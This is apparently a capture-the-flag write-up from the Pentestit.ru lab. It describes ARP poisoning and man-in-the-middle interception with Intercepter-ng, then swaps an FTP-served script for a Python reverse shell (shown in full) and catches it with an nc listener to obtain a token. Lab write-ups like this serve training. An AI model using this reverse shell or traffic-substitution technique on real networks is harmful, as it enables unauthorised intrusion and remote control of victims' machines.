Pentestit.ru V.9 (Part 9) – Token DEV
I have to say that until now this one (Token DEV) was the most fun and rewarding one. It made me use some previous knowledge analyze things, and once again think outside the box. It also made me know and learn a tool also known as Intercepter-ng.
So here we are, after get the Terminal2 Token, and have access to the Terminal2 machine we have the DEV machine in the same network, so we want to try to explore it, and get access to it.
On this machine we find a tool called Intercepter-ng and if it’s here, it means we need to use it right?
I started by watching some Intercept-ng videos like this one for example:https://www.youtube.com/watch?v=wVLD2iT6ADo
After understanding the tool and the potential of it, I started to use it. Doing a smart scan we got 2 IPs, the victim IP and a stealh IP. We select the victim IP as NAT client and go into the NAT option.
On the NAT tab we used the following settings:
- nat client to intercept: 192.168.3.3
- Stealth ip: 192.168.3.4 (default one)
- Gateway: 192.168.3.254 (see ipconfig /all)
We also setup the MiTM options for SSH MiTM attacks as we are expecting to intercept an SSH connection, since we see that DEV machine have an SSH image on the network diagram picture and it’s a linux box.
We start sniffing and we start the ARP Poison process.
After some time, we realized on the Passwords Tab that there’s something here \o/
Now, we must find out what this connection from 192.168.3.3 to 172.16.0.4 was for, and so we go to the packets tab. There we look for the ftp session, and we notice that the connection made was to download a test.py script.
So lets analyze what we got in that ftp server:
$sudo proxychains nc -nv 172.16.0.4 21 cd /home ls cisco_upload m.barry old test User cd m.barry/upload/test_scripts ls test.py cat test.py #!/usr/bin/env python # test-1 if __name__ == '__main__': print 'Hello World!'
That’s the file that the “dev” machine is downloading.
So after analyzing the rest of the ftp folders we notice that there is some other scripts there like the below one, that looks like a shell connection to server 172.16.0.2 (ssh server).
cat test.py #!/usr/bin/env python # test-1 import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("172.16.0.2",25251));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);
This can be of use, if we can make the “dev” machine to download this file instead.
So lets do it with the use of Intercepter-ng changer function. For that we need to create a new path for our script and needs to be similar to the previous one, so that we don’t need to change much. Also take note the length of the name of dir since it needs to be the same.
Original path script: /home/m.barry/upload/test_scripts/test.py
New path script: /home/m.barry/dir123/test_scripts/test.py
We create the above dir structure and copy there the new test.py script with the reverse shell to server 172.16.0.2
Now on the intercepter-ng we only need to make the change in traffic changer, and let it run with the same configurations we used before:
We also, set up a listener in 172.16.0.2 (ssh server):
d.nash@tl9-ssh:~$ nc -nlvp 25251
We make Intercepter-ng to run and then… We get our shell:
Finally with our shell we see what we need… Our Token \o/
d.nash@tl9-ssh:~$ nc -nlvp 25251 listening on [any] 25251 ... connect to [172.16.0.2] from (UNKNOWN) [192.168.3.4] 57873 /bin/sh: 0: can't access tty; job control turned off $ ls ftp_client.txt $ cat ftp_client.txt h***h*****9